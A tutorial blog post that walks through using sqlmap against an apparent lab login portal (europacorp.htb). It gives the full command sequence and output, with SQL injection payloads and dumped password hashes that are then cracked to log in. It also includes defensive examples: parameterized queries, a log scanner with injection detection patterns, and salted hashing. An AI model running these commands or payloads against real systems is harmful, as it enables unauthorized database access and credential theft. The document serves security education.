How To Dump Username And Password Using SQLMap Tool?
Table of Contents
- What is sqlmap in Kali?
- Dump Username And Password Using SQLMap
What is sqlmap in Kali?
SQLMap is an open-source tool used to both identify and exploit SQL injection vulnerabilities. It has many advanced features, such as dumping usernames and passwords from a remote website's database and bypassing WAFs (Web Application Firewalls).
Dump Username And Password Using Sqlmap
In this blog we introduce the SQLMap tool, one of the most popular SQL injection tools, and use it to dump usernames and passwords from a remote website.
Let's begin. We have opened the login page of the Europa Corp admin portal. Keep in mind that this is a virtual lab environment. Don't try to attack this website.
Let's enter a random email and password. First, we intercept this traffic using Burp Suite, which comes pre-installed in Kali Linux.
We have intercepted the login request to the Europa Corp admin portal using Burp Suite. Copy the whole request and save it in a file named sql.req.
The sql.req file looks like this. Let's open it with the cat command, which comes pre-installed in Kali Linux.
Before running sqlmap, keep in mind that this website uses HTTPS (Hypertext Transfer Protocol Secure). If you don't pass the --force-ssl option to sqlmap, you may get an SSL error. First, we retrieve the database names with the --dbs option.
sqlmap -r sql.req --force-ssl --dbs

```text
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.6.1.1#dev}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:59:46 /2022-01-16/

[23:59:46] [INFO] parsing HTTP request from 'sql.req'
[23:59:46] [INFO] resuming back-end DBMS 'mysql'
[23:59:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: [email protected]' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: [email protected]' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password
---
[23:59:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5
[23:59:48] [INFO] fetching database names
[23:59:48] [INFO] resumed: 'information_schema'
[23:59:48] [INFO] resumed: 'admin'
available databases [2]:
[*] admin
[*] information_schema

[23:59:48] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb'

[*] ending @ 23:59:48 /2022-01-16/
```
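The injection point sqlmap reports above is the email field of a login form: the application splices the submitted value straight into its SQL text. The following is an added example (not code from the original post or from the application in the lab) that shows that bug class beside the parameterized form that removes it. The table mirrors the admin.users layout enumerated later in the post; the two accounts, their passwords and the application functions are constructed for this example, and MD5 is used only because that is what the lab's table turned out to hold.

```python
"""Login query built by string concatenation vs. a parameterized query.

Added example, not code from the original post or from the lab application.
Schema follows the admin.users table (id, username, email, password, active);
rows and passwords are constructed.
"""
import hashlib
import sqlite3


def make_db():
    """In-memory copy of the users table with two constructed accounts."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "email TEXT, password TEXT, active INTEGER)"
    )
    pw = hashlib.md5(b"constructed-password").hexdigest()  # unsalted, as in the dump
    con.executemany(
        "INSERT INTO users VALUES (NULL, ?, ?, ?, 1)",
        [("admin", "admin@example.test", pw), ("john", "john@example.test", pw)],
    )
    return con


def login_vulnerable(con, email, password):
    """The bug class sqlmap found: user input becomes part of the SQL text.

    A quote inside 'email' ends the string literal, and everything after it
    is parsed as SQL, which is what every payload in the output above relies on.
    """
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = (
        "SELECT username FROM users WHERE email = '" + email
        + "' AND password = '" + pw_hash + "' AND active = 1"
    )
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(con, email, password):
    """Parameterized query: values travel separately from the SQL text, so a
    quote in 'email' is just a character in the value being compared."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = con.execute(
        "SELECT username FROM users WHERE email = ? AND password = ? AND active = 1",
        (email, pw_hash),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # A quote plus a SQL comment in the email field comments out the password
    # check in the concatenated query; the parameterized query is unaffected.
    probe = "admin@example.test' -- "
    print("vulnerable:", login_vulnerable(db, probe, "wrong"))  # admin
    print("safe:      ", login_safe(db, probe, "wrong"))        # None
```

The only change between the two functions is how the value reaches the database driver; the fix is not input filtering but keeping data out of the query text, and the same applies to every ORM or query builder that ends up calling a parameterized API underneath.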
Our first step completed successfully: we have got the database names of the remote website using the above command. Now let's find all tables inside the admin database with the command below.
sqlmap -r sql.req --force-ssl -D admin --tables

```text
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.6.1.1#dev}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:03:09 /2022-01-17/

[00:03:09] [INFO] parsing HTTP request from 'sql.req'
[00:03:10] [INFO] resuming back-end DBMS 'mysql'
[00:03:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: [email protected]' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: [email protected]' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password
---
[00:03:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5
[00:03:11] [INFO] fetching tables for database: 'admin'
[00:03:11] [INFO] resumed: 'users'
Database: admin
[1 table]
+-------+
| users |
+-------+

[00:03:11] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb'

[*] ending @ 00:03:11 /2022-01-17/
```
We have got the table name inside the admin database using the above command. Let's find all columns inside the users table.
sqlmap -r sql.req --force-ssl -D admin -T users --columns

```text
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.6.1.1#dev}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:05:52 /2022-01-17/

[00:05:52] [INFO] parsing HTTP request from 'sql.req'
[00:05:53] [INFO] resuming back-end DBMS 'mysql'
[00:05:53] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: [email protected]' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: [email protected]' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password
---
[00:05:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5
[00:05:54] [INFO] fetching columns for table 'users' in database 'admin'
[00:05:54] [INFO] resumed: 'id'
[00:05:54] [INFO] resumed: 'int(11)'
[00:05:54] [INFO] resumed: 'username'
[00:05:54] [INFO] resumed: 'varchar(255)'
[00:05:54] [INFO] resumed: 'email'
[00:05:54] [INFO] resumed: 'varchar(255)'
[00:05:54] [INFO] resumed: 'password'
[00:05:54] [INFO] resumed: 'varchar(255)'
[00:05:54] [INFO] resumed: 'active'
[00:05:54] [INFO] resumed: 'tinyint(1)'
Database: admin
Table: users
[5 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| active   | tinyint(1)   |
| email    | varchar(255) |
| id       | int(11)      |
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+

[00:05:54] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb'

[*] ending @ 00:05:54 /2022-01-17/
```
We have got the column names inside the users table using the above command. Let's dump the email and password credentials with the following command.
sqlmap -r sql.req --force-ssl -D admin -T users -C email,password --dump

```text
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.6.1.1#dev}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:08:33 /2022-01-17/

[00:08:33] [INFO] parsing HTTP request from 'sql.req'
[00:08:34] [INFO] resuming back-end DBMS 'mysql'
[00:08:34] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: [email protected]' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: [email protected]' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password
---
[00:08:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5
[00:08:36] [INFO] fetching entries of column(s) 'email,password' for table 'users' in database 'admin'
[00:08:38] [INFO] retrieved: '[email protected]'
[00:08:39] [INFO] retrieved: '2b6d315337f18617ba18922c0b9597ff'
[00:08:40] [INFO] retrieved: '[email protected]'
[00:08:42] [INFO] retrieved: '2b6d315337f18617ba18922c0b9597ff'
[00:08:42] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: admin
Table: users
[2 entries]
+----------------------+----------------------------------+
| email                | password                         |
+----------------------+----------------------------------+
| [email protected]    | 2b6d315337f18617ba18922c0b9597ff |
| [email protected]    | 2b6d315337f18617ba18922c0b9597ff |
+----------------------+----------------------------------+

[00:08:46] [INFO] table 'admin.users' dumped to CSV file '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb/dump/admin/users.csv'
[00:08:46] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb'

[*] ending @ 00:08:46 /2022-01-17/
```
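Each of the four runs above sent the same three payload shapes (the RLIKE/CASE boolean probe, the GTID_SUBSET error probe and the SLEEP time probe) through the login form, and those shapes are what a defender can look for in the web server's logs. The following is an added example, not part of the original post: a small log scanner whose patterns are derived from the three payloads sqlmap printed. The log lines are constructed, and the format is an assumption (Apache combined format with the raw POST body appended as one extra quoted field, as a custom LogFormat or a WAF audit log might record it).

```python
"""Spot SQL-injection probes of the kind sqlmap sent above in web server logs.

Added example, not part of the original post. Patterns are derived from the
three payload shapes in the sqlmap output; log lines are constructed and the
log format (combined format plus quoted POST body) is an assumption.
"""
import re
from urllib.parse import unquote_plus

# (rule name, pattern). Patterns run over the URL-decoded request line,
# POST body and User-Agent, case-insensitively.
RULES = [
    ("time-based blind (SLEEP)", re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I)),
    ("error-based (GTID_SUBSET)", re.compile(r"\bGTID_SUBSET\s*\(", re.I)),
    ("boolean-based blind (RLIKE)", re.compile(r"\bRLIKE\s*\(\s*SELECT\b", re.I)),
    # A closing quote followed by a SQL operator is the shape shared by all
    # three payloads; expect occasional false positives on free-text fields.
    ("quote followed by SQL operator", re.compile(r"'\s*(?:AND|OR|RLIKE)\b", re.I)),
    # Only fires when the client kept sqlmap's default User-Agent; with
    # "sqlmap -r" the headers of the saved Burp request are reused instead.
    ("sqlmap user agent", re.compile(r"\bsqlmap/\d", re.I)),
]

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
    r'(?: "(?P<body>[^"]*)")?$'
)


def classify(line):
    """Return (client ip, [names of rules that fired]) for one log line."""
    m = LOG_LINE.match(line)
    if not m:
        return None, []
    # Decode before matching: a browser or sqlmap sends the body URL-encoded,
    # so "SLEEP%285%29" would otherwise slip past a pattern for "SLEEP(5)".
    decoded = unquote_plus(m.group("req") + " " + (m.group("body") or ""))
    haystack = decoded + " " + m.group("ua")
    return m.group("ip"), [name for name, pat in RULES if pat.search(haystack)]


def scan(lines):
    """Map each client ip to the sorted set of rule names seen across its requests."""
    findings = {}
    for line in lines:
        ip, hits = classify(line)
        if hits:
            findings.setdefault(ip, set()).update(hits)
    return {ip: sorted(names) for ip, names in findings.items()}


# Constructed sample: one normal login, then three probes modelled on the
# payloads in the sqlmap output (bodies URL-encoded as a client sends them).
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Jan/2022:23:59:40 +0000] "POST /login.php HTTP/1.1" 302 0 "-" '
    '"Mozilla/5.0" "email=user%40example.test&password=secret"',
    '198.51.100.23 - - [16/Jan/2022:23:59:46 +0000] "POST /login.php HTTP/1.1" 200 1043 "-" '
    '"Mozilla/5.0" "email=user%40example.test%27+RLIKE+%28SELECT+%28CASE+WHEN+%285462%3D5462%29+'
    'THEN+0x61+ELSE+0x28+END%29%29--+uqLz&password=password"',
    '198.51.100.23 - - [16/Jan/2022:23:59:47 +0000] "POST /login.php HTTP/1.1" 500 512 "-" '
    '"Mozilla/5.0" "email=user%40example.test%27+AND+GTID_SUBSET%28CONCAT%280x71%2C%28SELECT+'
    '%28ELT%286429%3D6429%2C1%29%29%29%2C0x71%29%2C6429%29--+gHDo&password=password"',
    '198.51.100.23 - - [16/Jan/2022:23:59:53 +0000] "POST /login.php HTTP/1.1" 200 1043 "-" '
    '"sqlmap/1.6.1.1#dev (https://sqlmap.org)" "email=user%40example.test%27+AND+%28SELECT+4034+'
    'FROM+%28SELECT%28SLEEP%285%29%29%29WwrX%29--+frlv&password=password"',
]

if __name__ == "__main__":
    for ip, names in scan(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(names))
```

The error-based probe in the sample is logged with a 500 status, which is worth a rule of its own: a login endpoint that returns server errors for a handful of requests from one client is a strong signal even before any payload pattern matches.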
Boom! We have got the emails and passwords of the remote website, but the passwords are stored as hashes rather than plaintext (sqlmap flagged them as possible password hashes). Most modern websites store password hashes in the database instead of the passwords themselves. But I am lazy: to recover the passwords from the hashes, we will use the dcode website.
Let's put the recovered credentials into the email and password fields. After that, we get a 302 redirect from the remote website.
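Both rows in the dump carry the same 32-hex-character value, which is what an unsalted MD5 of an identical password looks like: one lookup recovers both accounts, and that is exactly why a hash lookup site works here. The following is an added example, not code from the original post, contrasting that storage scheme with a per-user salted, slow key derivation in which equal passwords no longer produce equal stored values. The passwords are constructed, and the PBKDF2 iteration count is an assumption to be tuned to the server's hardware.

```python
"""Unsalted MD5 (as in the dump) next to salted PBKDF2 password storage.

Added example, not code from the original post. Passwords are constructed;
the iteration count is an assumption (OWASP currently suggests 600,000 for
PBKDF2-HMAC-SHA256) and should be tuned to the hardware.
"""
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 600_000


def md5_store(password):
    """Unsalted fast hash, the scheme behind the dump: equal passwords give
    equal 32-hex-character values, so a precomputed table breaks them all."""
    return hashlib.md5(password.encode()).hexdigest()


def pbkdf2_store(password, salt=None):
    """Per-user random salt plus a slow KDF.

    Returns 'pbkdf2_sha256$<iterations>$<salt hex>$<hash hex>' so the
    parameters travel with the record and can be raised later.
    """
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return "pbkdf2_sha256${}${}${}".format(PBKDF2_ITERATIONS, salt.hex(), dk.hex())


def pbkdf2_verify(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iters, salt_hex, hash_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), hash_hex)


def same_value_for_same_password(store, password):
    """True when two users who chose the same password get identical stored values."""
    return store(password) == store(password)


if __name__ == "__main__":
    print("md5    shared value:", same_value_for_same_password(md5_store, "constructed-password"))
    print("pbkdf2 shared value:", same_value_for_same_password(pbkdf2_store, "constructed-password"))
```

With the salted scheme a dumped table still has to be attacked one row at a time and one guess at a time, at the cost of the iteration count per guess; a dedicated password hash such as bcrypt, scrypt or Argon2 is the usual production choice, and the verify-with-stored-parameters shape shown here is the same for all of them.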
Take a closer look at the below image.
Login Successful!!!!!